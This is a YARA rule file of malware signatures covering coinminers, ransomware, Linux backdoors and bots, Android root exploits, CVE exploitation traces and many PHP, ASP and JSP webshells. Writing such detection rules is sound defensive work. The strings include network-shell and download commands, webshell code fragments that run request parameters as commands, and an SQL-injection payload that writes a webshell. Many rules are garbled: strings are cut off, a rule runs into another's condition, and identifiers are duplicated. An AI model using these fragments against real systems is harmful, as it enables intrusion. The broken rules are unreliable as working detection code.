rule Multios_Coinminer_StratumIoc { strings: $a1 = "stratum+tcp" $a2 = "stratum+udp" $a3 = "stratum+ssl" $a4 = "ethproxy+tcp" $a5 = "nicehash+tcp" condition: any of them } rule Multios_Ransome_BlackMatter { strings: $s1 = "Another Instance Currently Running..." $s2 = "Removing Self Executable..." $s3 = "web_reporter::main_sender_proc()" $s4 = "NO stat available for " $s5 = "Please, just wait..." $s6 = ".cfgETD" condition: all of them } rule Multios_Coinminer_StratumProtocol { strings: $a1 = "stratum+tcp" $a2 = "stratum+udp" $a3 = "stratum+ssl" $a4 = "ethproxy+tcp" $a5 = "nicehash+tcp" condition: any of them } rule Multios_Coinminer_MinerKeywords { strings: $m1 = "Miner" $m2 = "miner" $s1 = "Stratum" $s2 = "stratum" $e1 = "encrypt" $e2 = "Encrypt" condition: ($s1 or $s2) and ($m1 or $m2) and ($e1 or $e2) } rule Multios_Coinminer_NameIoc { strings: $k01 = "_ZN5Miner" $k02 = "_ZN5miner" $k11 = "NBMiner" $k21 = "_ZN5xmrig" $k22 = "_ZN5Xmrig" condition: any of them } rule Multios_Trojan_Stowaway { strings: $k1 = "Stowaway" condition: $k1 } rule Unix_Packer_MumblehardM1 { strings: $decrypt = { 31 db [1-10] ba ?? 00 00 00 [0-10] (56 5f | 89 F7) 39 d3 75 13 81 fa ?? (00 | 01) 00 00 75 02 31 d2 81 c2 ?? 00 00 00 31 db 43 ac 30 d8 aa 43 e2 e2 } condition: $decrypt } rule Unix_Spyware_Suspicious_script { strings: $kill1 = "kill -9" $kill2 = "killall" $kill3 = "pkill -f" $remove1 = "rm -f" $remove2 = "rm -rf" $download1 = "wget " $download2 = "curl " $download3 = "tftp " $iptables1 = "iptables -A" $iptables2 = "iptables -F" $has_sensitive_file1 = "/root" $has_sensitive_file2 = "/etc/cron" $has_sensitive_file3 = "/.ssh" $has_sensitive_file4 = "system" $has_sensitive_file5 = "/usr/bin/passwd" $sensitive_ops1 = "chmod 777 " $sensitive_ops2 = "setsid" $sensitive_ops3 = "chattr -i" $sensitive_ops4 = "nohup" $sensitive_ops6 = "netcat -l" $bad_ops1 = "nc -l" $bad_ops2 = "bash -i" $sensitive_ops9 = "ulimit -n" $root1 = "insmod" $root2 = "modprobe" $root3 = "sysctl -w" $root4 = "wrmsr -a" condition: uint32(0) != 0x464c457f and filesize < 256KB and ( (8 of them) or $bad_ops1 or $bad_ops2 ) } rule Andr_Exploit_ExploitTools { strings: $s0 = "stack corruption detected: aborted" fullword ascii $s1 = "/proc/%d/fd/%d" fullword ascii $s2 = "SUCCESS: Enjoy the shell." fullword ascii condition: uint16(0) == 0x457f and 2 of them } rule Unix_Spyware_EquationGroup_morerats_client_Store { strings: $s1 = "[-] Failed to mmap file: %s" fullword ascii $s2 = "[-] can not NULL terminate input data" fullword ascii $s3 = "Missing argument for `-x'." fullword ascii $s4 = "[!] Value has size of 0!" fullword ascii condition: uint16(0) == 0x457f and filesize < 60KB and 2 of them } rule Andr_Exploit_Gingerbreak_unlocking_tools { strings: $s1 = "Android Exploid Crew." $s2 = "Killing ADB and restarting as root... enjoy!" $s3 = "GingerBread" condition: uint16(0) == 0x457f and 2 of them } rule Andr_Exploit_Droidkungfu { strings: $s1 = "/system/bin/kill -9 %s" $s2 = "%s/myicon" $s3 = "%s/secbin" $s4 = "/system/bin/secbin" condition: uint16(0) == 0x457f and all of them } rule Unix_Exploit_PsyBNC { strings: $s1 = "psychoid Exp" $s2 = "(%s)!psyBNC@lam3rz.de PRIVMSG %s :%s" condition: uint16(0) == 0x457f and all of them } rule Andr_Exploit_ToolsZerglings { strings: $s0 = "Overseer found a path ! 0x%08x" fullword ascii $s1 = "Killing ADB and restarting as root... enjoy!" fullword ascii $s2 = "Zerglings" fullword ascii condition: uint16(0) == 0x457f and 2 of them } rule Unix_Spyware_Bouncer { strings: $s1 = "/shutdown_request\">Shutdown Bouncer" $s2 = "Bouncer Successfully Shutdown" $s3 = "%s Bouncer Daemonized (PID = %d)" condition: uint16(0) == 0x457f and all of them } rule Unix_CVE_2021_40539 { strings: $x1 = "/ServletApi/../RestApi/LogonCustomization" ascii wide $x2 = "/ServletApi/../RestAPI/Connection" ascii wide condition: filesize < 50MB and 1 of them } rule Js_OBFUSC_SUSP_JS_Sept21_2_RID2E68 { strings: $s1 = "=new RegExp(String.fromCharCode(" ascii $s2 = ".charCodeAt(" ascii $s3 = ".substr(0, " ascii $s4 = "var shell = new ActiveXObject(" ascii $s5 = "= new Date().getUTCMilliseconds();" ascii $s6 = ".deleteFile(WScript.ScriptFullName);" ascii condition: filesize < 6000KB and ( 4 of them ) } rule Unix_CVE_2021_26084 { strings: $xr1 = /isSafeExpression Unsafe clause found in \['[^\n]{1,64}\\u0027/ ascii $xs1 = "[util.velocity.debug.DebugReferenceInsertionEventHandler] referenceInsert resolving reference [$!queryString]" $xs2 = "userName: anonymous | action: createpage-entervariables ognl.ExpressionSyntaxException: Malformed OGNL expression: '\\' [ognl.TokenMgrError: Lexical error at line 1" $sa1 = "GET /pages/doenterpagevariables.action" $sb1 = "%5c%75%30%30%32%37" $sb2 = "\\u0027" $sc1 = " ERROR " $sc2 = " | userName: anonymous | action: createpage-entervariables" $re1 = /\[confluence\.plugins\.synchrony\.SynchronyContextProvider\] getContextMap (\n )?-- url: \/pages\/createpage-entervariables\.action/ condition: 1 of ( $x* ) or ( $sa1 and 1 of ( $sb* ) ) or ( all of ( $sc* ) and $re1 ) } rule Multios_CVE_2021_33766 { strings: $ss0 = "POST " ascii $ss1 = " 500 0 0" $sa1 = "/ecp/" ascii $sa2 = "/RulesEditor/InboxRules.svc/NewObject" ascii $sb1 = "/ecp/" ascii $sb2 = "SecurityToken=" ascii condition: all of ( $ss* ) and ( all of ( $sa* ) or all of ( $sb* ) ) } rule Unix_Trojan_TinyShell { strings: $vara01 = { 73 3A 70 3A 00 } $vara02 = { 55 74 61 67 65 3A 20 25 73 } $vara03 = { 5B 20 2D 73 20 73 65 63 72 65 74 20 5D } $vara04 = { 5B 20 2D 70 20 70 6F 72 74 20 5D } $varb01 = { 41 57 41 56 41 55 41 54 55 53 0F B6 06 } $varb02 = { 48 C7 07 00 00 00 00 48 C7 47 08 00 00 } $vard01 = { 55 48 89 E5 41 57 41 56 41 55 41 54 53 } $vard02 = { 55 48 89 E5 48 C7 47 08 00 00 00 00 48 } $varb03 = { 89 DF E8 FB A4 FF FF 83 C3 01 81 FB 00 04 } $vard03 = { 66 89 05 7D 5E 00 00 } $vare01 = "socket" $vare02 = "connect" $vare03 = "alarm" $vare04 = "dup2" $vare05 = "execl" $vare06 = "openpty" $vare07 = "putenv" $vare08 = "setsid" $vare09 = "ttyname" $vare00 = "waitpid" $varc01 = "HISTFIL" $varc02 = "TERML" $varc03 = "/bin/sh" condition: (uint16(0) == 0x457f) and (all of ($vara*)) and ( filesize > 20KB or ( filesize < 100KB and ( (2 of ($varb*) or 2 of ($vard*)) or (1 of ($varb0*)) or (5 of ($vare*) or 2 of ($varc*)) ) ) ) } rule Unix_DDOS_Kaiten { strings: $irc = /(PING)|(PONG)|(NOTICE)|(PRIVMSG)/ $kill = "Killing pid %d" nocase $subnet = "What kind of subnet address is that" nocase $version = /(Helel mod)|(Kaiten wa goraku)/ $flood = "UDP " nocase condition: uint16(0) == 0x457f and $irc and 2 of ($kill, $subnet, $version, $flood) } rule Unix_Malware_HttpsdARM { strings: $hexsts01 = { f0 4f 2d e9 1e db 4d e2 ec d0 4d e2 01 40 a0 e1 } $hexsts02 = { f0 45 2d e9 0b db 4d e2 04 d0 4d e2 3c 01 9f e5 } $hexsts03 = { f0 45 2d e9 01 db 4d e2 04 d0 4d e2 bc 01 9f e5 } $st01 = "k.conectionapis.com" fullword nocase wide ascii $st02 = "key=%s&host_name=%s&cpu_count=%d&os_type=%s&core_count=%s" fullword nocase wide ascii $st03 = "id=%d&result=%s" fullword nocase wide ascii $st04 = "rtime" fullword nocase wide ascii $st05 = "down" fullword nocase wide ascii $st06 = "cmd" fullword nocase wide ascii $st07 = "0 */6 * * * root" fullword nocase wide ascii $st08 = "/etc/cron.d/httpsd" fullword nocase wide ascii $st09 = "cat /proc/cpuinfo |grep processor|wc -l" fullword nocase wide ascii $st10 = "k.conectionapis.com" fullword nocase wide ascii $st11 = "/api" fullword nocase wide ascii $st12 = "/tmp/.httpslog" fullword nocase wide ascii $st13 = "/bin/.httpsd" fullword nocase wide ascii $st14 = "/tmp/.httpsd" fullword nocase wide ascii $st15 = "/tmp/.httpspid" fullword nocase wide ascii $st16 = "/tmp/.httpskey" fullword nocase wide ascii condition: uint16(0) == 0x457f and filesize < 200KB and all of them } rule Unix_Malware_Httpsdi86 { strings: $hexsts01 = { 8d 4c 24 04 83 e4 f0 ff 71 fc 55 89 e5 57 56 53 } $hexsts02 = { 55 89 e5 57 56 53 81 ec 14 2c 00 00 68 7a 83 05 } $hexsts03 = { 55 89 e5 57 56 53 81 ec 10 04 00 00 68 00 04 00 } $st01 = "k.conectionapis.com" fullword nocase wide ascii $st02 = "key=%s&host_name=%s&cpu_count=%d&os_type=%s&core_count=%s" fullword nocase wide ascii $st03 = "id=%d&result=%s" fullword nocase wide ascii $st04 = "rtime" fullword nocase wide ascii $st05 = "down" fullword nocase wide ascii $st06 = "cmd" fullword nocase wide ascii $st07 = "0 */6 * * * root" fullword nocase wide ascii $st08 = "/etc/cron.d/httpsd" fullword nocase wide ascii $st09 = "cat /proc/cpuinfo |grep processor|wc -l" fullword nocase wide ascii $st10 = "k.conectionapis.com" fullword nocase wide ascii $st11 = "/api" fullword nocase wide ascii $st12 = "/tmp/.httpslog" fullword nocase wide ascii $st13 = "/bin/.httpsd" fullword nocase wide ascii $st14 = "/tmp/.httpsd" fullword nocase wide ascii $st15 = "/tmp/.httpspid" fullword nocase wide ascii $st16 = "/tmp/.httpskey" fullword nocase wide ascii condition: (uint16(0) == 0x457f) and (filesize < 200KB) and (all of them) } rule Unix_Packer_UpxDetail { strings: $a1 = "UPX!" $a2 = " UPX " $a3 = "!XPU" $h1 = { E8 ?? ?? ?? ?? 55 53 51 52 48 01 FE 56 41 ?? ?? ?? 0F 85 ?? ?? ?? ?? 55 48 89 E5 44 8B 09 49 89 D0 48 89 F2 48 8D 77 02 56 8A 07 FF CA 88 C1 } $h2 = { E8 ?? ?? ?? ?? 55 53 51 52 48 01 FE 56 48 89 FE 48 89 D7 31 DB 31 C9 48 83 CD FF E8 ?? ?? ?? ?? 01 DB 74 ?? F3 C3 8B 1E 48 83 EE FC 11 DB 8A } $h3 = { E8 ?? ?? ?? ?? EB 0E 5A 58 59 97 60 8A 54 24 20 E9 11 0B 00 00 60 8B 74 24 24 8B 7C 24 2C 83 CD FF 89 E5 8B 55 28 AC 4A 88 C1 24 07 C0 E9 03 BB 00 FD FF FF D3 E3 8D A4 5C 90 F1 FF FF 83 E4 E0 6A 00 6A } $h4 = { FC 41 5B 41 80 F8 ?? 74 0D E9 ?? ?? ?? ?? 48 FF C6 88 17 48 FF C7 8A 16 01 DB 75 0A 8B 1E 48 83 EE FC 11 DB 8A 16 72 E6 8D 41 01} condition: uint32(0) == 0x464c457f and any of them } rule Unix_Malware_RebirthVulcan { strings: $spec01 = "vulcan.sh" fullword nocase wide ascii $spec02 = "Vulcan" fullword nocase wide ascii $str01 = "/usr/bin/python" fullword nocase wide ascii $str02 = "nameserver 8.8.8.8\nnameserver 8.8.4.4\n" fullword nocase wide ascii $str03 = "Telnet Range %d->%d" fullword nocase wide ascii $str04 = "Mirai Range %d->%d" fullword nocase wide ascii $str05 = "[Updating] [%s:%s]" fullword nocase wide ascii $str06 = "rm -rf /tmp/* /var/* /var/run/* /var/tmp/*" fullword nocase wide ascii $str07 = "\x1B[96m[DEVICE] \x1B[97mConnected" fullword nocase wide ascii $hex01 = { 0D C0 A0 E1 00 D8 2D E9 } $hex02 = { 3C 1C 00 06 27 9C 97 98 } $hex03 = { 94 21 EF 80 7C 08 02 A6 } $hex04 = { E6 2F 22 4F 76 91 18 3F } $hex05 = { 06 00 1C 3C 20 98 9C 27 } $hex06 = { 55 89 E5 81 EC ?? 10 00 } $hex07 = { 55 48 89 E5 48 81 EC 90 } $hex08 = { 6F 67 69 6E 00 } $bot01 = "MIRAITEST" fullword nocase wide ascii $bot02 = "TELNETTEST" fullword nocase wide ascii $bot03 = "UPDATE" fullword nocase wide ascii $bot04 = "PHONE" fullword nocase wide ascii $bot05 = "RANGE" fullword nocase wide ascii $bot06 = "KILLATTK" fullword nocase wide ascii $bot07 = "STD" fullword nocase wide ascii $bot08 = "BCM" fullword nocase wide ascii $bot09 = "NETIS" fullword nocase wide ascii $bot10 = "FASTLOAD" fullword nocase wide ascii condition: uint32(0) == 0x464c457f and filesize < 300KB and all of ($spec*) and 4 of ($str*) and 2 of ($hex*) and 6 of ($bot*) } rule Unix_CVE_2021_38647 { strings: $a1 = "/opt/omi/bin/omiagent" ascii fullword $s1 = "OMI-1.6.8-0 - " ascii $s2 = "OMI-1.6.6-0 - " ascii $s3 = "OMI-1.6.4-1 - " ascii $s4 = "OMI-1.6.4-0 - " ascii $s5 = "OMI-1.6.2-0 - " ascii $s6 = "OMI-1.6.1-0 - " ascii $s7 = "OMI-1.5.0-0 - " ascii $s8 = "OMI-1.4.4-0 - " ascii $s9 = "OMI-1.4.3-2 - " ascii $s10 = "OMI-1.4.3-1 - " ascii $s11 = "OMI-1.4.3-0 - " ascii $s12 = "OMI-1.4.2-5 - " ascii $s13 = "OMI-1.4.2-4 - " ascii $s14 = "OMI-1.4.2-3 - " ascii $s15 = "OMI-1.4.2-2 - " ascii $s16 = "OMI-1.4.2-1 - " ascii $s17 = "OMI-1.4.1-1 - " ascii $s18 = "OMI-1.4.1-0 - " ascii $s19 = "OMI-1.4.0-6 - " ascii condition: uint32(0) == 0x464c457f and $a1 and 1 of ( $s* ) } rule Multios_HKTL_KhepriBeaconRID3027 { strings: $x1 = "NT %d.%d Build %d ProductType:%s" ascii fullword $xe1 = "YzIuQ01EUEFSQU0uY21k" ascii $xe2 = "MyLkNNRFBBUkFNLmNtZ" ascii $xe3 = "jMi5DTURQQVJBTS5jbW" ascii $sx1 = "c2.ProcessItem.user" ascii fullword $sx2 = "c2.CMDPARAM.cmd" ascii fullword $sx3 = "c2.DownLoadFile.file_path" ascii fullword $sa1 = "file size zero" $sa2 = "cmd.exe /c " $sa3 = "error parse param" $sa4 = "innet_ip" $op1 = { c3 b9 b4 98 49 00 87 01 5d c3 b8 b8 98 49 00 c3 8b ff } $op2 = { 8b f1 80 3d 58 97 49 00 00 0f 85 96 00 00 00 33 c0 40 b9 50 97 49 00 87 01 33 db } $op3 = { 90 d5 0c 43 00 34 0d 43 00 ea 0c 43 00 7e 0d 43 00 b6 0d 43 00 cc } $op4 = { 69 c0 ff 00 00 00 8b 4d c0 23 88 40 7c 49 00 89 4d c0 8b 45 cc 0b 45 c0 89 45 cc 8b 45 d0 } condition: ( uint16 (0) == 0x5a4d or uint32(0) == 0x464c457f ) and filesize < 2000KB and ( 1 of ( $x* ) or 2 of ( $sx* ) or all of ( $sa* ) or 3 of ( $op* ) ) or ( filesize < 10MB and 1 of ( $xe* ) ) or 5 of them } rule Js_Packer_JJEncoder { strings: $jjencode = /(\$|[\S]+)=~\[\]\;(\$|[\S]+)\=\{[\_]{3}\:[\+]{2}(\$|[\S]+)\,[\$]{4}\:\(\!\[\]\+["]{2}\)[\S]+/ fullword condition: $jjencode } rule Win_Packer_Emotet { strings: $pdb1 = "123EErrrtools.pdb" $pdb2 = "gGEW\\F???/.pdb" condition: uint16 (0) == 0x5a4d and $pdb1 or $pdb2 } rule Win_Packer_ZbotBanker { strings: $a = "__SYSTEM__" wide $b = "*tanentry*" $c = "* 3 and #b > 3 and #c > 3 and #d > 3 and #e > 3) } rule Win_Packer_Borland { strings: $patternBorland = "Borland" wide ascii condition: uint16 (0) == 0x5a4d and $patternBorland } rule Win_Packer_EnigmaProtector1XSukhovVladimirSergeNMarkin { strings: $a0 = { 00 00 00 56 69 72 74 75 61 6C 41 6C 6C 6F 63 00 00 00 56 69 72 74 75 61 6C 46 72 65 65 00 00 00 47 65 74 4D 6F 64 75 6C 65 48 61 6E 64 6C 65 41 00 00 00 47 65 74 50 72 6F 63 41 64 64 72 65 73 73 00 00 00 45 78 69 74 50 72 6F 63 65 73 73 00 00 00 4C 6F 61 64 4C 69 62 72 61 72 79 41 00 00 00 4D 65 73 73 61 67 65 42 6F 78 41 00 00 00 52 65 67 43 6C 6F 73 65 4B 65 79 00 00 00 53 79 73 46 72 65 65 53 74 72 69 6E 67 00 00 00 43 72 65 61 74 65 46 6F 6E 74 41 00 00 00 53 68 65 6C 6C 45 78 65 63 75 74 65 41 00 00 } condition: uint16 (0) == 0x5a4d and $a0 } rule Win_Packer_MSLRHv032afakePCGuard4xxemadicius { strings: $a0 = { FC 55 50 E8 00 00 00 00 5D EB 01 E3 60 E8 03 00 00 00 D2 EB 0B 58 EB 01 48 40 EB 01 35 FF E0 E7 61 58 5D EB 05 E8 EB 04 40 00 EB FA E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF 83 C4 08 74 04 75 02 EB 02 EB 01 81 50 E8 02 00 00 00 29 5A 58 6B C0 03 E8 02 00 00 00 29 5A 83 C4 04 58 74 04 75 02 EB 02 EB 01 81 0F 31 50 0F 31 E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF } condition: uint16 (0) == 0x5a4d and $a0 } rule Win_Packer_SPLayerv008 { strings: $a0 = { 8D 40 00 B9 [4] 6A ?? 58 C0 0C [2] 48 [2] 66 13 F0 91 3B D9 [8] 00 00 00 00 } condition: uint16 (0) == 0x5a4d and $a0 } rule Win_Packer_DxPackV086Dxd { strings: $a0 = { 60 E8 00 00 00 00 5D 8B FD 81 ED 06 10 40 00 2B BD 94 12 40 00 81 EF 06 00 00 00 83 BD 14 13 40 00 01 0F 84 2F 01 00 00 } condition: uint16 (0) == 0x5a4d and $a0 } rule Win_Packer_AnskyaNTPackerGeneratorAnskya { strings: $a0 = { 55 8B EC 83 C4 F0 53 B8 88 1D 00 10 E8 C7 FA FF FF 6A 0A 68 20 1E 00 10 A1 14 31 00 10 50 E8 71 FB FF FF 8B D8 85 DB 74 2F 53 A1 14 31 00 10 50 E8 97 FB FF FF 85 C0 74 1F 53 A1 14 31 00 10 50 E8 5F FB FF FF 85 C0 74 0F 50 E8 5D FB FF FF 85 C0 74 05 E8 70 FC FF FF 5B E8 F2 F6 FF FF 00 00 48 45 41 52 54 } condition: uint16 (0) == 0x5a4d and $a0 } rule Win_Packer_EmbedPEV100V124cyclotron { strings: $a0 = { 00 00 00 00 [4] 00 00 00 00 00 00 00 00 [8] 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [12] 00 00 00 00 [12] 00 00 00 00 4B 45 52 4E 45 4C 33 32 2E 64 6C 6C 00 00 00 00 47 65 74 50 72 6F 63 41 64 64 72 65 73 73 00 00 00 47 65 74 4D 6F 64 75 6C 65 48 61 6E 64 6C 65 41 00 00 00 4C 6F 61 64 4C 69 62 72 61 72 79 41 00 00 00 00 00 00 00 00 00 } condition: uint16 (0) == 0x5a4d and $a0 } rule Asp_Webshell_Laudanum_File { strings: $s1 = "' *** Written by Tim Medin " fullword ascii $s2 = "Response.BinaryWrite(stream.Read)" fullword ascii $s3 = "Response.Write(Response.Status & Request.ServerVariables(\"REMOTE_ADDR\"))" fullword ascii $s4 = "%>\">web root
<%" fullword ascii $s5 = "set folder = fso.GetFolder(path)" fullword ascii $s6 = "Set file = fso.GetFile(filepath)" fullword ascii condition: filesize < 30KB and uint16(0) == 0x253c and 5 of them } rule Asp_Webshell_Laudanum_Shell { strings: $s1 = "
" fullword ascii $s2 = "%ComSpec% /c dir" fullword ascii $s3 = "Set objCmd = wShell.Exec(cmd)" fullword ascii $s4 = "Server.ScriptTimeout = 180" fullword ascii $s5 = "cmd = Request.Form(\"cmd\")" fullword ascii $s6 = "' *** http://laudanum.secureideas.net" fullword ascii $s7 = "Dim wshell, intReturn, strPResult" fullword ascii condition: filesize < 15KB and 4 of them } rule Php_Webshell_Laudanum_Killnc { strings: $s1 = "if ($_SERVER[\"REMOTE_ADDR\"] == $IP)" fullword ascii $s2 = "header(\"HTTP/1.0 404 Not Found\");" fullword ascii $s3 = "" fullword ascii $s4 = "Laudanum Kill nc" fullword ascii $s5 = "foreach ($allowedIPs as $IP) {" fullword ascii condition: filesize < 15KB and 4 of them } rule Php_Webshell_Laudanum_Settings { strings: $s1 = "Port: " fullword ascii $s2 = "
  • Reverse Shell - " fullword ascii $s3 = "
  • \">File Browser" ascii condition: filesize < 13KB and all of them } rule Asp_Webshell_Laudanum_Proxy { strings: $s1 = "'response.write \"
    -value:\" & request.querystring(key)(j)" fullword ascii $s2 = "q = q & \"&\" & key & \"=\" & request.querystring(key)(j)" fullword ascii $s3 = "for each i in Split(http.getAllResponseHeaders, vbLf)" fullword ascii $s4 = "'urlquery = mid(urltemp, instr(urltemp, \"?\") + 1)" fullword ascii $s5 = "s = urlscheme & urlhost & urlport & urlpath" fullword ascii $s6 = "Set http = Server.CreateObject(\"Microsoft.XMLHTTP\")" fullword ascii condition: filesize < 50KB and all of them } rule Cfm_Webshell_Laudanum_Shell { strings: $s1 = "Executable:
    " fullword ascii $s2 = "" fullword ascii $s3 = "" fullword ascii condition: filesize < 20KB and 2 of them } rule Asp_Webshell_Laudanum_Shellx { strings: $s1 = "command_hist[current_line] = document.shell.command.value;" fullword ascii $s2 = "if (e.keyCode == 38 && current_line < command_hist.length-1) {" fullword ascii $s3 = "array_unshift($_SESSION['history'], $command);" fullword ascii $s4 = "if (preg_match('/^[[:blank:]]*cd[[:blank:]]*$/', $command)) {" condition: filesize < 40KB and all of them } rule Asp_Webshell_ChinaChopper { strings: $ChinaChopperASPX = {25 40 20 50 61 67 65 20 4C 61 6E 67 75 61 67 65 3D ?? 4A 73 63 72 69 70 74 ?? 25 3E 3C 25 65 76 61 6C 28 52 65 71 75 65 73 74 2E 49 74 65 6D 5B [1-100] 75 6E 73 61 66 65} condition: $ChinaChopperASPX } rule Php_Webshell_ChinaChopper { strings: $ChinaChopperPHP = {3C 3F 70 68 70 20 40 65 76 61 6C 28 24 5F 50 4F 53 54 5B ?? 70 61 73 73 77 6F 72 64 ?? 5D 29 3B 3F 3E} condition: $ChinaChopperPHP } rule Php_Webshell_Dotico { strings: $php = " 70KB and $php at 0 and filesize < 110KB and $regexp } rule Php_Trojan_Anuna { strings: $a = /<\?php \$[a-z]+ = '/ $b = /\$[a-z]+=explode\(chr\(\([0-9]+[-+][0-9]+\)\)/ $c = /\$[a-z]+=\([0-9]+[-+][0-9]+\)/ $d = /if \(!function_exists\('[a-z]+'\)\)/ condition: all of them } rule Jsp_Webshell_webshell_jsp_by_string { strings: $jstring1 = "Boot Shell" wide ascii $jstring2 = "String oraPWD=\"" wide ascii $jstring3 = "Owned by Chinese Hackers!" wide ascii $jstring4 = "AntSword JSP" wide ascii $jstring5 = "JSP Webshell" wide ascii $jstring15 = "Runtime.getRuntime().exec(request.getParameter(" nocase wide ascii $jstring16 = "GIF98a<%@page" wide ascii $jstring17 = "ClassLoader" condition: any of ( $jstring* ) } rule Php_Webshell_webshell_behinder { strings: $token0 = "e45e329feb5d925b" $token1 = "rebeyond" condition: any of($token*) } rule Php_Webshell_webshell_php_obfuscated_tiny { strings: $obf1 = /\w'\.'\w/ ascii $obf2 = /\w\"\.\"\w/ ascii $obf3 = "].$" wide ascii $gfp1 = "eval(\"return [$serialised_parameter" // elgg $gfp2 = "$this->assert(strpos($styles, $" $gfp3 = "$module = new $_GET['module']($_GET['scope']);" $gfp4 = "$plugin->$_POST['action']($_POST['id']);" $gfp5 = "$_POST[partition_by]($_POST[" $gfp6 = "$object = new $_REQUEST['type']($_REQUEST['id']);" $gfp7 = "The above example code can be easily exploited by passing in a string such as" // ... ;) $gfp8 = "Smarty_Internal_Debug::start_render($_template);" $gfp9 = "?p4yl04d=UNION%20SELECT%20'',2,3%20INTO%20OUTFILE%20'/var/www/w3bsh3ll.php" $gfp10 = "[][}{;|]\\|\\\\[+=]\\|?" $gfp11 = "(eval (getenv \"EPROLOG\")))" $gfp12 = "ZmlsZV9nZXRfY29udGVudHMoJ2h0dHA6Ly9saWNlbnNlLm9wZW5jYXJ0LWFwaS5jb20vbGljZW5zZS5waHA/b3JkZXJ" $php_short = " 2 or #obf3 > 10 ) } rule Php_Webshell_ChinaChopper_Generic { strings: $x_aspx = /%@\sPage\sLanguage=.Jscript.%><%eval\(RequestItem\[.{,100}unsafe/ $x_php = / 570 and filesize < 800 } rule Php_Webshell_webshell_h4ntu_shell_powered_by_tsoi_ { strings: $s0 = "
    Server Adress:User Info: ui" $s4 = "
    : \".mysql_error().\"$f_" $s4 = "print \"Current Directory" $s4 = "

    " fullword condition: 2 of them } rule Php_Webshell_webshell_iMHaPFtp_2 { strings: $s8 = "if ($l) echo '    \"+strCut(convertPath(list[i].getPath()),7" $s3 = " \"reg add \\\"HKEY_LOCAL_MACHINE\\\\SYSTEM\\\\CurrentControlSet\\\\Control" condition: all of them } rule Php_Webshell_webshell_Safe_Mode_Bypass_PHP_4_4_2_and_PHP_5_1_2 { strings: $s0 = "die(\"\\nWelcome.. By This script you can jump in the (Safe Mode=ON) .. Enjoy\\n" $s1 = "Mode Shell v1.0[\" (left bracket), \"|\" (pi" $s3 = "word: \"null\", \"yes\", \"no\", \"true\"," condition: 1 of them } rule Php_Webshell_webshell_PHPRemoteView { strings: $s2 = "" fullword $s4 = "String path=new String(request.getParameter(\"path\").getBytes(\"ISO-8859-1\"" condition: all of them } rule Php_Webshell_webshell_caidao_shell_guo { strings: $s0 = "
    \\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n" condition: 1 of them } rule Asp_Webshell_webshell_asp_cmd { strings: $s0 = "<%= \"\\\\\" & oScriptNet.ComputerName & \"\\\" & oScriptNet.UserName %>" fullword $s1 = "Set oFileSys = Server.CreateObject(\"Scripting.FileSystemObject\")" fullword $s3 = "Call oScript.Run (\"cmd.exe /c \" & szCMD & \" > \" & szTempFile, 0, True)" fullword condition: 1 of them } rule Php_Webshell_webshell_php_sh_server { strings: $s0 = "eval(getenv('HTTP_CODE'));" fullword condition: all of them } rule Php_Webshell_webshell_PH_Vayv_PH_Vayv { strings: $s0 = "style=\"BACKGROUND-COLOR: #eae9e9; BORDER-BOTTOM: #000000 1px in" $s4 = "SHOPEN    " fullword condition: all of them } rule Php_Webshell_webshell_cihshell_fix { strings: $s7 = "" fullword $s8 = "" fullword condition: all of them } rule Php_Webshell_webshell_Private_i3lue { strings: $s8 = "case 15: $image .= \"\\21\\0\\" condition: all of them } rule Php_Webshell_webshell_php_up { strings: $s0 = "copy($HTTP_POST_FILES['userfile']['tmp_name'], $_POST['remotefile']);" fullword $s3 = "if(is_uploaded_file($HTTP_POST_FILES['userfile']['tmp_name'])) {" fullword $s8 = "echo \"Uploaded file: \" . $HTTP_POST_FILES['userfile']['name'];" fullword condition: 2 of them } rule Php_Webshell_webshell_Mysql_interface_v1_0 { strings: $s0 = "echo \"Go Execute
    All the data in these tables:
    \".$tblsv.\" were putted " condition: all of them } rule Php_Webshell_webshell_Server_Variables { strings: $s7 = "<% For Each Vars In Request.ServerVariables %>" fullword $s9 = "Variable Name

    " fullword condition: all of them } rule Php_Webshell_webshell_caidao_shell_ice_2 { strings: $s0 = "" fullword condition: all of them } rule Php_Webshell_webshell_caidao_shell_mdb { strings: $s1 = "<% execute request(\"ice\")%>a " fullword condition: all of them } rule Jsp_Webshell_webshell_jsp_guige { strings: $s0 = "if(damapath!=null &&!damapath.equals(\"\")&&content!=null" condition: all of them } rule Php_Webshell_webshell_phpspy2010 { strings: $s3 = "eval(gzinflate(base64_decode(" $s5 = "//angel" fullword $s8 = "$admin['cookiedomain'] = '';" fullword condition: all of them } rule Asp_Webshell_webshell_asp_ice { strings: $s0 = "D,'PrjknD,J~[,EdnMP[,-4;DS6@#@&VKobx2ldd,'~JhC" condition: all of them } rule Php_Webshell_webshell_drag_system { strings: $s9 = "String sql = \"SELECT * FROM DBA_TABLES WHERE TABLE_NAME not like '%$%' and num_" condition: all of them } rule Asp_Webshell_webshell_DarkBlade1_3_asp_indexx { strings: $s3 = "Const strs_toTransform=\"command|Radmin|NTAuThenabled|FilterIp|IISSample|PageCou" condition: all of them } rule Php_Webshell_webshell_phpshell3 { strings: $s2 = "" fullword condition: all of them } rule Asp_Webshell_webshell_asp_404 { strings: $s0 = "lFyw6pd^DKV^4CDRWmmnO1GVKDl:y& f+2" condition: all of them } rule Php_Webshell_webshell_webshell_cnseay02_1 { strings: $s0 = "(93).$_uU(41).$_uU(59);$_fF=$_uU(99).$_uU(114).$_uU(101).$_uU(97).$_uU(116).$_uU" condition: all of them } rule Php_Webshell_webshell_php_fbi { strings: $s7 = "erde types','Getallen','Datum en tijd','Tekst','Binaire gegevens','Netwerk','Geo" condition: all of them } rule Php_Webshell_webshell_B374kPHP_B374k { strings: $s0 = "Http://code.google.com/p/b374k-shell" fullword $s1 = "$_=str_rot13('tm'.'vas'.'yngr');$_=str_rot13(strrev('rqb'.'prq'.'_'.'46r'.'fno'" $s3 = "Jayalah Indonesiaku & Lyke @ 2013" fullword $s4 = "B374k Vip In Beautify Just For Self" fullword condition: 1 of them } rule Asp_Webshell_webshell_cmd_asp_5_1 { strings: $s9 = "Call oS.Run(\"win.com cmd.exe /c \"\"\" & szCMD & \" > \" & szTF &" fullword condition: all of them } rule Php_Webshell_webshell_php_dodo_zip { strings: $s0 = "$hexdtime = '\\x' . 